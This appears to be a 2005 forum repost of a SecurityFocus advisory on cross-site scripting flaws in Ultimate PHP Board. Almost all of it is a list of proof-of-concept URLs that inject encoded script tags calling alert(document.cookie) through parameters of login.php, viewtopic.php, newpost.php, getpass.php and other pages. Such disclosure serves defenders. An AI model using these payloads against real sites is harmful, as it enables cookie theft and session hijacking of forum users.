|
Título: Ultimate PHP Board Multiple Cross-Site Scripting Vulnerabilities Publicado por: Touring en 18 Junio 2005, 00:17 am Ultimate PHP Board Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Fuente security focus |